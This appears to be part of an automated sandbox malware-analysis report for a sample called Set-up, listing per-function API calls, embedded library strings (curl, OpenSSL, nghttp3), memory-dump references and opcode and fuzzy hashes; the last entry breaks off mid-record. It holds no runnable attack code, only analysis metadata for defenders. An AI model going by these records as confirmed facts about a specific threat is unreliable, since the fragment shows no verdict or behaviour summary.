                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assertmemcpy$memmove
                                • String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
                                • API String ID: 3463011695-2629231663
                                • Opcode ID: 85755b1384e4cc2871dcd83de97c6ba243ffc4ff50e1c0b17dcec3505cb2db71
                                • Instruction ID: d6eb202282acd2a51724af9ded836a3cd2ddbb612807b8f0fd085f6e0b473b41
                                • Opcode Fuzzy Hash: 85755b1384e4cc2871dcd83de97c6ba243ffc4ff50e1c0b17dcec3505cb2db71
                                • Instruction Fuzzy Hash: 8D4180B5604304AFC708DF18D88186AB7EAFF98714F48C96DE8899B352E770ED11CB95
                                Function 00352480 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00352491
                                • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 003524C6
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0034F5B4), ref: 00352529
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: CertCertificateContextProperty$ErrorLast
                                • String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
                                • API String ID: 2217977984-837018288
                                • Opcode ID: 9f991eddd54fa8b72b6a7059774907411ab816e30870dfb3837f2a99f3b13b30
                                • Instruction ID: 1222d839faab870ba87e52c08273cc100ef131454093b23b5235830839cbfc27
                                • Opcode Fuzzy Hash: 9f991eddd54fa8b72b6a7059774907411ab816e30870dfb3837f2a99f3b13b30
                                • Instruction Fuzzy Hash: 8011B6A5B9030477FA203771BC47F3B3A4CEB52B89F044534FA08651D3E5E599248EA3
                                Function 00162430 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 277stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00162666
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00162699
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 001626FB
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 0016273A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$_time64memcpy
                                • String ID: :%u$Shuffling %i addresses$hostip.c
                                • API String ID: 2198566249-1766712111
                                • Opcode ID: f573668d42811ab5080f0f3cf0452d691bf35e304aab9a2bafbcd25d7cf1f23f
                                • Instruction ID: e734d659bdcfba78d6aa7ea787a1b12d0ccc7cb2b4326caa9fcc4ed290cde838
                                • Opcode Fuzzy Hash: f573668d42811ab5080f0f3cf0452d691bf35e304aab9a2bafbcd25d7cf1f23f
                                • Instruction Fuzzy Hash: 54A1DD75A04B009BD734DE18DC45BABB7E5EF98304F19843DED8A87382E735E9618B81
                                Function 00496940 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 152COMMON
                                Download Yara Rule
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 004969F1
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496A11
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,000000FF,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496A53
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496AB6
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496AC7
                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496ADA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errno$abortmemcpymemset
                                • String ID: UTF-8
                                • API String ID: 3754757788-243350608
                                • Opcode ID: bd568a31293167de5522a4781319728e532a0f13f814b92e2c036f5cfc9e4417
                                • Instruction ID: 901233ec56ad078ba4e3305688f14e271edfe3d134099e6a0d764795feda42aa
                                • Opcode Fuzzy Hash: bd568a31293167de5522a4781319728e532a0f13f814b92e2c036f5cfc9e4417
                                • Instruction Fuzzy Hash: 6041D4B06083016FDF118F69D895B2B7FE5AB86358F06893EF88587381E639DC44C75A
                                Function 0011230E Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 133stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00112359
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00112465
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001124AB
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001123EE
                                  • Part of subcall function 00111A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00111A70
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free$abortmallocstrlen
                                • String ID: $ $ $Memory allocation failed for decrypted data.
                                • API String ID: 673139954-1317699236
                                • Opcode ID: b7a02b9ec97734f3e1d8e712ea6039664ff91077252286315cada36acdeaa42d
                                • Instruction ID: 1950035792a38c97f3a8961f2891151c3a3c6cf20303614f9add7bce73173678
                                • Opcode Fuzzy Hash: b7a02b9ec97734f3e1d8e712ea6039664ff91077252286315cada36acdeaa42d
                                • Instruction Fuzzy Hash: B75183B4A047099FCB04EFA9C48599EBBF1FF88300F10896AE85897325E774D954CF92
                                Function 00126330 Relevance: 12.1, APIs: 8, Instructions: 77sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0012D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,001201B1), ref: 0012D8E2
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0015420E,?,?), ref: 00126350
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(0015420E,?,?,?,?,?,?,?,?,?,0015420E,?,?), ref: 0012635B
                                • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00126369
                                • Sleep.KERNEL32(00000001), ref: 001263B2
                                • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 001263BC
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0015420E,?,?), ref: 001263C7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0015420E,?,?), ref: 001263D6
                                  • Part of subcall function 0012D8C0: GetTickCount.KERNEL32 ref: 0012D968
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 001263ED
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
                                • String ID:
                                • API String ID: 1793959362-0
                                • Opcode ID: b8713239c43ac293a4f3e33951fa2f81a0d080def233029b4e5651a684874523
                                • Instruction ID: e9e97ab1986daf07533d3a34bc0bb0d07829125effdfa2ca9f3e292067661404
                                • Opcode Fuzzy Hash: b8713239c43ac293a4f3e33951fa2f81a0d080def233029b4e5651a684874523
                                • Instruction Fuzzy Hash: 87110BB7C0026057EB11A625BC42B7F7758BFA6728F080239FC4C92282FB25D96483D3
                                Function 00116220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143stringCOMMON
                                Download Yara Rule
                                APIs
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0011623A
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0011624D
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0011627C
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00116389
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$_time64memcpy
                                • String ID: .$hsts.c
                                • API String ID: 2198566249-2242870694
                                • Opcode ID: 9c45198af3062062bf283b4c20001b42301ec69854220dc83fba07242d95fdd4
                                • Instruction ID: d04caafef0ab3ee249a50e600d7130a7053e425e6b3f377a1f2f3d262cb1edbb
                                • Opcode Fuzzy Hash: 9c45198af3062062bf283b4c20001b42301ec69854220dc83fba07242d95fdd4
                                • Instruction Fuzzy Hash: 88412BA5D043445BEB18BE60AC067DF7698AF35314F080438FD5D53283F776A9A8C692
                                Function 00494430 Relevance: 10.6, APIs: 7, Instructions: 108stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 0049447B
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 004944C4
                                • WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 004944E3
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 00494500
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0049450B
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 0049451F
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00494546
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$strcmp$AddressByteCharMultiStringWide
                                • String ID:
                                • API String ID: 389649969-0
                                • Opcode ID: 85bc7304d765ed94c055df54c02c7ded5e51ccb8108e7be350e5abf45abfe39a
                                • Instruction ID: 8a9e0e74e6a1a10254886c17e51a6585364371b2e5128460d1adb77e8a350377
                                • Opcode Fuzzy Hash: 85bc7304d765ed94c055df54c02c7ded5e51ccb8108e7be350e5abf45abfe39a
                                • Instruction Fuzzy Hash: 5E315BB190430577FF209A65DC01FBB7A8C9BD1368F09423EFA48962C1FA7DBD458266
                                Function 0032E110 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 90stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0032E16C
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0032E17B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen
                                • String ID: $ for$:$Ente$crypto/ui/ui_lib.c
                                • API String ID: 39653677-4294831502
                                • Opcode ID: 2839cb7ee02cff65a5ec2896f5473b64b60b256fcde777067c5d9a0950ac5b47
                                • Instruction ID: abb68e272e5627a5fafcde9cd785ffd76351375f6e3cdb2fcc78bb2e4c0b0e88
                                • Opcode Fuzzy Hash: 2839cb7ee02cff65a5ec2896f5473b64b60b256fcde777067c5d9a0950ac5b47
                                • Instruction Fuzzy Hash: CA21CBF69043207BE6119956BC42D6B7BEC9D91394F0A4439FD0C86242F635D924C6E3
                                Function 00352240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                Download Yara Rule
                                APIs
                                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0034F763,?,?,?,?,?), ref: 00352251
                                • WideCharToMultiByte.KERNEL32 ref: 00352284
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 003522BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$wcslen
                                • String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
                                • API String ID: 1062461220-336193293
                                • Opcode ID: c9fe8a266b892469cc4f1ba5f4af2f4db33cf457a255f97928e89f4b94451576
                                • Instruction ID: 07655064a915820c8bc1b3278f1bf83103e209440e1dee7fdf61360d0c58614b
                                • Opcode Fuzzy Hash: c9fe8a266b892469cc4f1ba5f4af2f4db33cf457a255f97928e89f4b94451576
                                • Instruction Fuzzy Hash: 52213BB5F043047BEB202761AC06F2B3648AB91715F148639FD0C661D2EAF85C548F92
                                Function 004828F0 Relevance: 10.3, APIs: 8, Instructions: 342COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000005,?,?,?,?,0046DA6D,00000000,0083D9B4,?,?,?,?,?), ref: 0048299B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00482A76
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00020000), ref: 00482A82
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00482AAE
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00482ABA
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00482B3F
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00482C32
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000005,?,?,?,?,?,?,0046DA6D,00000000,0083D9B4,?,?,?,?,?), ref: 00482CB2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy$freemalloc
                                • String ID:
                                • API String ID: 3313557100-0
                                • Opcode ID: 5046d603a94fd3252230c88e938c23c6d318e10f91fc871fa2bda040c97fa93c
                                • Instruction ID: a995e99d48559c7a30a2231ad8a0654a897aa5fd6e8b1055cfeef67f1dcc7bb6
